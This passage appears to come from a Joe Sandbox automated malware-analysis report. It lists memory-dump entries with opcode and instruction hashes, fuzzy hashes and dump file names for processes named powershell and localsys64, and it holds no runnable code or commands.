                                                    • Instruction ID: 43b4bf2f604c955364b9f60e4461e953fc64ed2c3fb7e752213f67102fdd90d1
                                                    • Opcode Fuzzy Hash: b3d8a446e1513338aec5d8b77172002047c28fe5707f82f8f044c7fa732ec12b
                                                    • Instruction Fuzzy Hash: EA21E63190CB4C8FEB59DBAC984A6E97FE0EB56321F04426BD049C3152DA74A456CB91
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.2233252593.00007FFD9B960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B960000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_7ffd9b960000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 48289b6e62abc9ee90df9b5320ee14c73240e16646f46212d2376ef60dac40d3
                                                    • Instruction ID: 23c364d10dd7a0cd8e4307c0934906e771e0861313b86c2ef1ea9a5b9fee6537
                                                    • Opcode Fuzzy Hash: 48289b6e62abc9ee90df9b5320ee14c73240e16646f46212d2376ef60dac40d3
                                                    • Instruction Fuzzy Hash: E421C222F2E98AAFE7B9DA98446227467C1EF71210B4B40BED05DC76A2DE14EC048341
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.2233252593.00007FFD9B960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B960000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_7ffd9b960000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 4419559b07b4149f04d4e90e755ae3d277f6e681b5239fcf11204e191728affd
                                                    • Instruction ID: 4cbdea75ce6c10ec3ca0f0c4665938f54df4a801edf300bfcb1188a8d2060653
                                                    • Opcode Fuzzy Hash: 4419559b07b4149f04d4e90e755ae3d277f6e681b5239fcf11204e191728affd
                                                    • Instruction Fuzzy Hash: 04110232F2F58A9FE7B5D7989475AB87BD0EF40620B4A00BED05DC72A6DA19AC008341
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.2231811315.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_7ffd9b890000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                                    • Instruction ID: 790f53b18bf535405e1566ca4fc67868e3ace26fd97990e01e1bad52e7daa871
                                                    • Opcode Fuzzy Hash: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                                    • Instruction Fuzzy Hash: 7401A73020CB0C4FDB48EF0CE451AA6B7E0FB89320F10056DE58AC36A1DA32E882CB41
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.2231811315.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_7ffd9b890000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 62127e3d444d1f3b244f25c17acd236f5c37e1009a043705ab73a390ba55dfe4
                                                    • Instruction ID: d122a13e5ebb840b0119f187c366a800e56cd990694709f4513719f723beab97
                                                    • Opcode Fuzzy Hash: 62127e3d444d1f3b244f25c17acd236f5c37e1009a043705ab73a390ba55dfe4
                                                    • Instruction Fuzzy Hash: 3DF03C7264E7860FF7664B6CAC624A47FB0DF5323070A42EBD4D1CB4B3D51A584B8751
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.2231811315.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_7ffd9b890000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: M_^8$M_^<$M_^?$M_^J$M_^K$M_^N$M_^Q$M_^Y
                                                    • API String ID: 0-962139525
                                                    • Opcode ID: 78afc6692382add72f29a453e46cef919c850fcb415a89dede20db3bf3140953
                                                    • Instruction ID: ad9997269ca045c2f6f29c292932e0e691c5b571fa522245f23bec43a457ca72
                                                    • Opcode Fuzzy Hash: 78afc6692382add72f29a453e46cef919c850fcb415a89dede20db3bf3140953
                                                    • Instruction Fuzzy Hash: 2021C2B3B04525CAD30A36ACBC559D87780DF5437938603F3E029CF193F958A48B8A81
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.2231811315.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_7ffd9b890000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: M_^$M_^$M_^$M_^$M_^$M_^
                                                    • API String ID: 0-3353809593
                                                    • Opcode ID: 4b1fcaf9e51a82a6fdb70ee5592b217fd560ad712bb5caf9c8b42d267289fae5
                                                    • Instruction ID: 4674117365168a808c4deb580dbc406ae03ce5654a1481f1570fa01b5ede29e7
                                                    • Opcode Fuzzy Hash: 4b1fcaf9e51a82a6fdb70ee5592b217fd560ad712bb5caf9c8b42d267289fae5
                                                    • Instruction Fuzzy Hash: FC31E5A3B0BADB4BEB6F062A48654957FD0FF26BD871A03F2C0D48A0A3BC146D434552
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000010.00000002.2315537414.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_16_2_7ffd9b870000_localsys64.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: P_^
                                                    • API String ID: 0-2466244897
                                                    • Opcode ID: 48ca449519ab1e8a842bc12aade788b16516ad256fff4f6ab01e98df2545ff3e
                                                    • Instruction ID: 70586c497a3379f9d0f37f5ef2f1575d33ee9e1360fe9d7754d30d12e170d5e6
                                                    • Opcode Fuzzy Hash: 48ca449519ab1e8a842bc12aade788b16516ad256fff4f6ab01e98df2545ff3e
                                                    • Instruction Fuzzy Hash: C55138A6B0901D8FD308BB6CACF59E97B61FF8431878441B2D0ADC72DBED342942C641
                                                    Memory Dump Source
                                                    • Source File: 00000010.00000002.2315537414.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_16_2_7ffd9b870000_localsys64.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 94a649cca547d5256ee17adbfce07744b0121497a7709dd0cc6d5e465c045172
                                                    • Instruction ID: 0648960b229e0f433151a49a310ccfaeab53e181b9bffcf7a7d94d40078d4ad4
                                                    • Opcode Fuzzy Hash: 94a649cca547d5256ee17adbfce07744b0121497a7709dd0cc6d5e465c045172
                                                    • Instruction Fuzzy Hash: A5817821B1E68A0FE756E77C88B55B93BE1EF8A214B0900FBD04DC71E7DD286C428352
                                                    Memory Dump Source
                                                    • Source File: 00000010.00000002.2315537414.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_16_2_7ffd9b870000_localsys64.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: c40e16ac9257fe6ff57e8feba928e783516a3ed3af0b6774c561f085e3628057
                                                    • Instruction ID: 179c1be3f367aa5b75aa6ec5990e2fd30fc6530baeb487a51255ac8a5d19158f
                                                    • Opcode Fuzzy Hash: c40e16ac9257fe6ff57e8feba928e783516a3ed3af0b6774c561f085e3628057
                                                    • Instruction Fuzzy Hash: D871A771F2951D4FDB98FB7894B9ABD76A2FF98305F900478E00EC32D6DE2869018341
                                                    Memory Dump Source
                                                    • Source File: 00000010.00000002.2315537414.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_16_2_7ffd9b870000_localsys64.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 7d1c97a4085da6a89cae1f23fc29bb6da70f82742e570f16e49037f9041c9219
                                                    • Instruction ID: 8ffb20eee8bba8252c525b0a3b6199efb64db8deb6d144487e018bf106ee479d
                                                    • Opcode Fuzzy Hash: 7d1c97a4085da6a89cae1f23fc29bb6da70f82742e570f16e49037f9041c9219
                                                    • Instruction Fuzzy Hash: F331D521B189480FEB98FB6C9869A79A6C2EFDC755F0505BEE04EC32E7DD246C418341
                                                    Memory Dump Source
                                                    • Source File: 00000010.00000002.2315537414.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_16_2_7ffd9b870000_localsys64.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: f5b915ec5b862c9ac4b6d5565fb80551f64c9732b285b338f7a579000eab97cb
                                                    • Instruction ID: e74931dbc3640375de6a2ecd0b1173bfd15d62dbfbf6a2e8ae9e08b825d548a8
                                                    • Opcode Fuzzy Hash: f5b915ec5b862c9ac4b6d5565fb80551f64c9732b285b338f7a579000eab97cb
                                                    • Instruction Fuzzy Hash: B831F521B1C9480FEB98EB6C9869A79B7D2EFD8609F0505BEE05DC32E7DD249C428341
                                                    Memory Dump Source
                                                    • Source File: 00000010.00000002.2315537414.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_16_2_7ffd9b870000_localsys64.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 314ab2cb3e80fd9426e2e2cc1ec530d45ff226219e5ff1b235b28dc6aa041a84
                                                    • Instruction ID: 2e6ed23468c7331bf92d9d37fc7b7734d793fe29aca57176844dfb091344238f
                                                    • Opcode Fuzzy Hash: 314ab2cb3e80fd9426e2e2cc1ec530d45ff226219e5ff1b235b28dc6aa041a84
                                                    • Instruction Fuzzy Hash: 48312561B19A094FEB58B7B85C69ABC77D6EF98714F0502B7E01CC32D6DD2869028391
                                                    Memory Dump Source
                                                    • Source File: 00000010.00000002.2315537414.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_16_2_7ffd9b870000_localsys64.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 2a54e54d44ff8994cfdae86960a8ce5125a7b645a8abbe41d1428e8d0f891b0c
                                                    • Instruction ID: 023a4ed746077d82548a5bda84642b96066e9058d3dc0e2027efabd5e0bb546c
                                                    • Opcode Fuzzy Hash: 2a54e54d44ff8994cfdae86960a8ce5125a7b645a8abbe41d1428e8d0f891b0c
                                                    • Instruction Fuzzy Hash: 1A318171F19A0D8FEB48EBA898A57ADB7A1FF98301F500579D009D32D6DE386841C741
                                                    Memory Dump Source
                                                    • Source File: 00000010.00000002.2315537414.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_16_2_7ffd9b870000_localsys64.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: db0f52d7e0f39a911b2c18882646a9ea0fba8a3bf84f09f080b115f91c5bf005
                                                    • Instruction ID: 6e3b892746c8ef321c2946e25fe2c93580b85c710158a0e4b9cfb1286dfe9e96
                                                    • Opcode Fuzzy Hash: db0f52d7e0f39a911b2c18882646a9ea0fba8a3bf84f09f080b115f91c5bf005
                                                    • Instruction Fuzzy Hash: 2C311066B4A64D5FD308EB2C98F49A8BF61EF84354B8441BAD049C32EBDE346802C352
                                                    Memory Dump Source
                                                    • Source File: 00000010.00000002.2315537414.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_16_2_7ffd9b870000_localsys64.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 6ef7b8c50dbcbcde05e61502fb49569695247e5d68ce73562e770d66f5be39a9
                                                    • Instruction ID: 600c7a7b7c3f1d8a8efb6c5560ad7dd1298e9bc350650ab6488bc4dd05324c3a
                                                    • Opcode Fuzzy Hash: 6ef7b8c50dbcbcde05e61502fb49569695247e5d68ce73562e770d66f5be39a9
                                                    • Instruction Fuzzy Hash: A731E175B4960D4FD348EB2C94B49A9BFB1EFC4304B8045B9D05DC32EADE346802C751
                                                    Memory Dump Source
                                                    • Source File: 00000010.00000002.2315537414.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_16_2_7ffd9b870000_localsys64.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 91010e3f4af6b77f259e969c51722d453e65d31ed6ef4262281df9fd6583b159
                                                    • Instruction ID: 63420b82900dfe5eef696cd4b7b38bd6fcce4c10c8a654be6bb416eb199abf67
                                                    • Opcode Fuzzy Hash: 91010e3f4af6b77f259e969c51722d453e65d31ed6ef4262281df9fd6583b159
                                                    • Instruction Fuzzy Hash: 3221AEA5B5990D5FD348EB2C94B49A9BF71EFC8300B8044B5E01DC33EADE746901C751
                                                    Memory Dump Source
                                                    • Source File: 00000010.00000002.2315537414.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_16_2_7ffd9b870000_localsys64.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 54cd4c67d16766485b9f29893b5767c20305fdc1dc7ad88835801c7340125543
                                                    • Instruction ID: bbeb7872a8a87c581a9d85ff303238cc518abe03d0732ba97da54d9627e6107b
                                                    • Opcode Fuzzy Hash: 54cd4c67d16766485b9f29893b5767c20305fdc1dc7ad88835801c7340125543
                                                    • Instruction Fuzzy Hash: DD017B11B0E6890FE796637818B54757FF0CF96305B0504BAE888C31E7D908AB858382
                                                    Memory Dump Source
                                                    • Source File: 00000011.00000002.2382424983.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_17_2_7ffd9b8a0000_localsys64.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: aa7e2b6aabb9800dd4d00c8d603b0abb9f8f2c866ec4257c053607e0c92c289e
                                                    • Instruction ID: 03b87557de418661f8574ffcb5416977d384ec99ce1729f95c674d3ef55614cc
                                                    • Opcode Fuzzy Hash: aa7e2b6aabb9800dd4d00c8d603b0abb9f8f2c866ec4257c053607e0c92c289e
                                                    • Instruction Fuzzy Hash: 7F42CA61B29A494FEB98FB7C98656B977D2FF9C300F440579E01EC32D6DE28A8418351
                                                    Memory Dump Source
                                                    • Source File: 00000011.00000002.2382424983.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_17_2_7ffd9b8a0000_localsys64.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: bfb3f3203e12b14a13fe901e65fb513ddcff666df625626a8875c68fb5a81519
                                                    • Instruction ID: 5e98ea889b6a4d42797f5926819c1c019b39ce6b3bab2a0bbb33f2ad069c3825
                                                    • Opcode Fuzzy Hash: bfb3f3203e12b14a13fe901e65fb513ddcff666df625626a8875c68fb5a81519
                                                    • Instruction Fuzzy Hash: 00510E20B0E6C94FD79AAB7858746757FE1DF8B219B0801FBE089C71E7DD085806C352
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000011.00000002.2382424983.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_17_2_7ffd9b8a0000_localsys64.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: M_^
                                                    • API String ID: 0-814507619
                                                    • Opcode ID: 39578a60b2c0ef37fc48425c14e5047d70278bec391f2a6f73fac4906e05e5ca
                                                    • Instruction ID: fd42964d397d6af7c1b337e6931672aa79d897f1d356bf3433616cbe08724e82
                                                    • Opcode Fuzzy Hash: 39578a60b2c0ef37fc48425c14e5047d70278bec391f2a6f73fac4906e05e5ca
                                                    • Instruction Fuzzy Hash: 1F518A72B0D5998FE71AA76CAC758E97FA0EF8421878441B6D0ACCB1D7ED383406C761
                                                    Memory Dump Source
                                                    • Source File: 00000011.00000002.2382424983.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_17_2_7ffd9b8a0000_localsys64.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 9158ebc606dbdcf20e505d6bc3bb9a23bbd557f40e91c3b3220c1f3f1c6a6a36
                                                    • Instruction ID: 504c83af20e32d057d500b98fa05305ea2cb2968c8d62e6bbe74fb8170ab6478
                                                    • Opcode Fuzzy Hash: 9158ebc606dbdcf20e505d6bc3bb9a23bbd557f40e91c3b3220c1f3f1c6a6a36
                                                    • Instruction Fuzzy Hash: 77816622B1EA8A0FE75AE77898755B97BE1EF86210B0901FBD04DC71E7DD1C68068351
                                                    Memory Dump Source
                                                    • Source File: 00000011.00000002.2382424983.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_17_2_7ffd9b8a0000_localsys64.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: a006cc9e7f2e5ca95ade2ea5b7b4587dd47213fbf1260adddf8ab76530e21fa2
                                                    • Instruction ID: 202e449aa168cf8821caf4c818108d038cc464a389db5f51868d814e93983552
                                                    • Opcode Fuzzy Hash: a006cc9e7f2e5ca95ade2ea5b7b4587dd47213fbf1260adddf8ab76530e21fa2
                                                    • Instruction Fuzzy Hash: 6E31D521B1894C0FEB98FB6C9869679B6C2EF9D745F0505BEE04EC32E7DD689C418341
                                                    Memory Dump Source
                                                    • Source File: 00000011.00000002.2382424983.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_17_2_7ffd9b8a0000_localsys64.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 3110af5a3384009b0a8b6ae6c098af2584134a50eb36a1734d34e0af49120430
                                                    • Instruction ID: 93d2d00c163cb1fecb928ffd327d637ea2e2cf97c411acb2226b9888ec9f6889
                                                    • Opcode Fuzzy Hash: 3110af5a3384009b0a8b6ae6c098af2584134a50eb36a1734d34e0af49120430
                                                    • Instruction Fuzzy Hash: 9531F861F19A094FE758BBAC5C297BC77D2EF99611F0502B7E01DC32D6DD2868028351
                                                    Memory Dump Source
                                                    • Source File: 00000011.00000002.2382424983.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_17_2_7ffd9b8a0000_localsys64.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 644ac27ef262c395dfa55589967b272c3e81536f31443a8001c4791ddfb53631
                                                    • Instruction ID: 31f07664d7e7992d7ecd918617a017c8fd6b6f03b6e640710f1706dc2f0d86ca
                                                    • Opcode Fuzzy Hash: 644ac27ef262c395dfa55589967b272c3e81536f31443a8001c4791ddfb53631
                                                    • Instruction Fuzzy Hash: DE318F70B18A0D8FEF58EBA8D865AEDB7A1FF98300F5405B9D019D32C6DE38A845C751
                                                    Memory Dump Source
                                                    • Source File: 00000011.00000002.2382424983.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_17_2_7ffd9b8a0000_localsys64.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 3dd4a704c83183826ab3b5369e6994eae87a48cd0e139f4019931ffdc8ec8ac8
                                                    • Instruction ID: ea31b8a359062f9551e7dea6f5db4b2de8307a0b1f1deda50ee24f1616d16d84
                                                    • Opcode Fuzzy Hash: 3dd4a704c83183826ab3b5369e6994eae87a48cd0e139f4019931ffdc8ec8ac8
                                                    • Instruction Fuzzy Hash: EC21D835B589494FDB4DEB6898A48E9BF71EFC8200BC044A5E41DC33DBDE3869058761
                                                    Memory Dump Source
                                                    • Source File: 00000011.00000002.2382424983.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_17_2_7ffd9b8a0000_localsys64.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 55770ec26572c14c32f96d57365fead4642a90fb23900d4ee1d276d7ebb78edf
                                                    • Instruction ID: c15642ba3d8aa7cb68e3bce55e6a26b1ebbe18ea0be1c4b3299ebf3c6731cbe8
                                                    • Opcode Fuzzy Hash: 55770ec26572c14c32f96d57365fead4642a90fb23900d4ee1d276d7ebb78edf
                                                    • Instruction Fuzzy Hash: C8017B20A0D6890FEB95733818A44717FE0CF86300B0905BAE8C8C60A7D908AB85C3A2
                                                    Memory Dump Source
                                                    • Source File: 00000012.00000002.2463220529.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_18_2_7ffd9b880000_localsys64.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 0a0e1df6d8ad2dff97dd48b97e3c6a7c750d86c94f572624791365c8dc69ce64
                                                    • Instruction ID: db9a60c9652ea9bc4cd5ed50f53d225abbfeeea37be1c5ce7ef9ef995f463e97
                                                    • Opcode Fuzzy Hash: 0a0e1df6d8ad2dff97dd48b97e3c6a7c750d86c94f572624791365c8dc69ce64
                                                    • Instruction Fuzzy Hash: 7F42D820B29E494FE798FB789869AB977D2FF9C304F400579E45DC32DADE38A8018741
                                                    Memory Dump Source
                                                    • Source File: 00000012.00000002.2463220529.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_18_2_7ffd9b880000_localsys64.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: afe42508ff99804ae6cb6add7f67b524a7b3edbc95516f26c86ed12908b074cd
                                                    • Instruction ID: 319239ba9dfc210b517a69899a330e5af1aee9567e3ce1bc17b9905eb44c4000
                                                    • Opcode Fuzzy Hash: afe42508ff99804ae6cb6add7f67b524a7b3edbc95516f26c86ed12908b074cd
                                                    • Instruction Fuzzy Hash: E7511F10B0EAC94FD79AAB7858746757FE2DF8B219B0900FBE099C71E7DD181806C342
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000012.00000002.2463220529.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_18_2_7ffd9b880000_localsys64.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: O_^
                                                    • API String ID: 0-2592452328
                                                    • Opcode ID: 72fc99002b80110346323c147c98e8f8f740bc9f554a44eea719564b4b57c40e
                                                    • Instruction ID: 86033552ace1d721d44593c20b8c5873b6842c059fe5a7d3c0c222ad5f2b58eb
                                                    • Opcode Fuzzy Hash: 72fc99002b80110346323c147c98e8f8f740bc9f554a44eea719564b4b57c40e
                                                    • Instruction Fuzzy Hash: 64518972B0A51E8BD35DBB6CAC788E97B61EF4531C74440B2D06D872CBEE3824438691
                                                    Memory Dump Source
                                                    • Source File: 00000012.00000002.2463220529.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_18_2_7ffd9b880000_localsys64.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: fddd88964288d9497e80cc9b92043f88f5d4d950608bc39f6880e83b0f2b8ece
                                                    • Instruction ID: 0743c3c533b5139256658338ecea23787c429ef08051416f46d2fbd2193c8ece
                                                    • Opcode Fuzzy Hash: fddd88964288d9497e80cc9b92043f88f5d4d950608bc39f6880e83b0f2b8ece
                                                    • Instruction Fuzzy Hash: 30815621B1EA8A0FE756E77C98755F97BE1EF8A210B0900BBD05DC71E7DD286C428351
                                                    Memory Dump Source
                                                    • Source File: 00000012.00000002.2463220529.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_18_2_7ffd9b880000_localsys64.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 292af1399d88d23a321bfed6910be1236c46fb768725417b8425de46eca31d8b
                                                    • Instruction ID: 6a8b938c35f586e1821e07ffaaab3fcdbbe95fc0cee2d50c2623cfadf5e30601
                                                    • Opcode Fuzzy Hash: 292af1399d88d23a321bfed6910be1236c46fb768725417b8425de46eca31d8b
                                                    • Instruction Fuzzy Hash: 3431E321B18D480FEB98FB2C9869679A6C2EFDC705F0505BEE01EC32E7DD68AC418341
                                                    Memory Dump Source
                                                    • Source File: 00000012.00000002.2463220529.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_18_2_7ffd9b880000_localsys64.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: ec49549bce141d2f2e08f2c268ef0e35596a8bf72a069794fd51b687f6a85851
                                                    • Instruction ID: 4a467ba377f818e39410bd050f5bf06a8929359c175c20a2030edbc49cb5a874
                                                    • Opcode Fuzzy Hash: ec49549bce141d2f2e08f2c268ef0e35596a8bf72a069794fd51b687f6a85851
                                                    • Instruction Fuzzy Hash: 2A31E761B19A094FE759B7BC58297BC77D2EFD8611F0501B7E01DC32E6DD2868428351
                                                    Memory Dump Source
                                                    • Source File: 00000012.00000002.2463220529.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_18_2_7ffd9b880000_localsys64.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: cfad36fb9510f06c03fc95ee154260b5b02fa1b3ccb4e342dc9d1493aae4bdfd
                                                    • Instruction ID: 113741a62fa2c344ddb4c2170481b91c2ce565f5ccd381ffcabdcfde90eb82fb
                                                    • Opcode Fuzzy Hash: cfad36fb9510f06c03fc95ee154260b5b02fa1b3ccb4e342dc9d1493aae4bdfd
                                                    • Instruction Fuzzy Hash: 36312B31B0AA4D5FD349E72C98B88E97F61EF8624478041F5D498C72DFDE3829428761
                                                    Memory Dump Source
                                                    • Source File: 00000012.00000002.2463220529.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_18_2_7ffd9b880000_localsys64.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 6b8abc07079f45efb077e036eaa3e60bafc13034b7414dfd88a905607e994319
                                                    • Instruction ID: 1df16d696fe91ce1828345b4eafab2e83c7799ab34221d2a66f4a07d00ea2ff4
                                                    • Opcode Fuzzy Hash: 6b8abc07079f45efb077e036eaa3e60bafc13034b7414dfd88a905607e994319
